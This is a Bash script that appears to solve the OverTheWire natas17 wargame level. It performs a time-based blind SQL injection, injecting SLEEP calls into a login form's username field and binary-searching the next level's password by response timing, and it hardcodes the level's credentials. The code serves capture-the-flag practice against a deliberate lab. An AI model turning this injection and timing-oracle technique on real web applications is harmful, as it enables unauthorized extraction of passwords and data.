108 lines
2.4 KiB
Bash
Executable file
108 lines
2.4 KiB
Bash
Executable file
#!/usr/bin/env bash
|
|
|
|
USERNAME="natas17"
|
|
PASSWORD="EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC"
|
|
TARGET="natas18"
|
|
|
|
DELAY=4
|
|
PREFIX="5mxv8BZZVSMzzYPcY95M9m"
|
|
|
|
req() {
|
|
CMD=$@
|
|
curl "http://$USERNAME.natas.labs.overthewire.org/index.php" \
|
|
-X POST \
|
|
-u "$USERNAME:$PASSWORD" \
|
|
-d "username=natas18\" AND $CMD AND SLEEP($DELAY) # " \
|
|
-sS &>/dev/null
|
|
}
|
|
|
|
time_req() (
|
|
export STAT
|
|
export CMD="$@"
|
|
(time (req $CMD; STAT=$?)) \
|
|
|& grep real \
|
|
| awk '{print substr($2, 3, 1)}'
|
|
return $STAT
|
|
)
|
|
|
|
# ie `guess_length "=32"` or `guess_length ">32"`
|
|
guess_length() {
|
|
ELAPSED=$(time_req "LENGTH(password)$1")
|
|
return $(( ELAPSED < DELAY ))
|
|
}
|
|
|
|
get_length() {
|
|
echo "[*] Guessing length"
|
|
local MIN=${1:-1}
|
|
local MAX=${2:-100}
|
|
# local PADMAX=${#MAX}
|
|
local FGUESS="%${#MAX}s-%-${#MAX}s"
|
|
while true; do
|
|
printf "[-] Guess: $FGUESS\r" $MIN $MAX
|
|
if [ $((MAX-MIN)) -eq 1 ]; then
|
|
break
|
|
fi;
|
|
|
|
local MID=$(( (MAX+MIN)/2 ))
|
|
guess_length ">$MID" && MIN=$MID || MAX=$MID
|
|
done
|
|
printf "[+] Found: $FGUESS\n" $MIN $MAX
|
|
return $MAX
|
|
}
|
|
|
|
LOWER="abcdefghijklmnopqrstuvwxyz"
|
|
UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
|
DIGIT="0123456789"
|
|
|
|
guess_regex() {
|
|
ELAPSED=$(time_req "REGEXP_LIKE(password, '^$1[a-zA-Z0-9]*\$', 'c')")
|
|
return $(( ELAPSED < DELAY ))
|
|
}
|
|
|
|
exploit_oracle() {
|
|
echo "[@] Forcing oracle exploit"
|
|
local PREFIX=""
|
|
local LENGTH=$1
|
|
|
|
while true; do
|
|
if [ "${#PREFIX}" = "$LENGTH" ]; then
|
|
break
|
|
fi
|
|
|
|
for chars in $LOWER $UPPER $DIGIT; do
|
|
local MIN=1
|
|
local MAX=${#chars}
|
|
|
|
local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
|
|
echo -en "[*] ?? $RANGE\r"
|
|
guess_regex "$PREFIX$RANGE$POSTFIX" || continue
|
|
echo "[+] Found[CHARSET]: $chars"
|
|
|
|
local MID=$(( (MAX+MIN)/2 ))
|
|
while true; do
|
|
echo -en "[*] Guess: $RANGE\r"
|
|
if [ $((MAX-MIN)) -eq 1 ]; then
|
|
local NEWCHAR
|
|
if guess_regex "$PREFIX${chars:MIN-1:1}"; then
|
|
NEWCHAR=${chars:MIN-1:1}
|
|
else
|
|
NEWCHAR=${chars:MAX-1:1}
|
|
fi
|
|
PREFIX="$PREFIX$NEWCHAR"
|
|
echo -e "[+] Update: $NEWCHAR -> $PREFIX"
|
|
break
|
|
fi;
|
|
|
|
MID=$(( (MAX+MIN)/2 ))
|
|
RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
|
|
guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
|
|
done
|
|
break
|
|
done
|
|
done
|
|
printf "[+] Found: $FGUESS\n" $MIN $MAX
|
|
}
|
|
|
|
get_length
|
|
LENGTH=$?
|
|
exploit_oracle "$LENGTH"
|